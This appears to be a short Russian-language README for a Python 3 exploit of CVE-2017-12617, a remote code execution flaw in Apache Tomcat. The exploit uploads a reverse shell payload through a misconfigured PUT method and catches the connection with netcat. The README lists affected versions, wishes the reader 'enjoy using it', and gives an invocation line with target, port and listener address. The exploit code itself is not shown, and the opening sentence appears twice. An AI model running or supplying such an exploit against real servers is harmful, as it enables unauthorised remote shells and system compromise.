
CVE-2017-12617 — это критическая уязвимость, приводящая к удалённому выполнению кода (RCE) в Apache Tomcat.
CVE-2017-12617 — это критическая уязвимость, приводящая к удалённому выполнению кода (RCE) в Apache Tomcat.
Уязвимость затрагивает версии 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81.
Протестировано только на 8.0.24. Уязвимость использует неправильно настроенную опцию PUT в приложении или самом экземпляре Tomcat.
Она использует PUT для отправки полезной нагрузки reverse shell на сервер и её выполнения, одновременно прослушивая порт с помощью netcat.
В интернете есть много версий этого эксплойта, основанных на python2, поэтому я переписал его для работы с Python 3.
Приятного использования.
Пример использования:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
